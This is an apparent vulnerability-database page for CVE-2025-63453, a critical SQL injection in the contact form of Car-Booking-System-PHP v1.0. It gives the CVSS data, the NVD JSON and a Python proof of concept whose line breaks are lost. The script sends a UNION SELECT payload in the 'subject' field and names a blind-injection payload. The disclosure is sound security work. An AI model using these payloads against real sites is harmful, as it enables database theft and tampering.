Security Vulnerability Report
中文
CVE-2025-63453 CVSS 9.8 CRITICAL

CVE-2025-63453

Published: 2025-11-03 16:15:38
Last Modified: 2025-11-07 20:46:34

Description

Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/contact.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:* - VULNERABLE
Car-Booking-System-PHP v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63453 SQL Injection PoC # Target: Car-Booking-System-PHP v1.0 # Endpoint: /carlux/contact.php target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/carlux/contact.php" # Payload for SQL Injection - extracts database version payload = "' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12-- -" data = { 'name': 'Test User', 'email': '[email protected]', 'phone': '1234567890', 'subject': payload, 'message': 'Test message' } print(f"[*] Sending SQL injection payload to {target_url}") print(f"[*] Payload: {payload}") try: response = requests.post(target_url, data=data, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if 'UNION' in response.text or 'SELECT' in response.text: print("[!] Potential SQL injection detected - check response for data leakage") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Boolean-based blind injection example blind_payload = "' AND 1=1-- -" print(f"\n[*] Testing blind injection with: {blind_payload}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63453", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:37.767", "lastModified": "2025-11-07T20:46:33.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/contact.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20E6E810-0009-4D9D-828A-68A38A642BEE"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-14", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}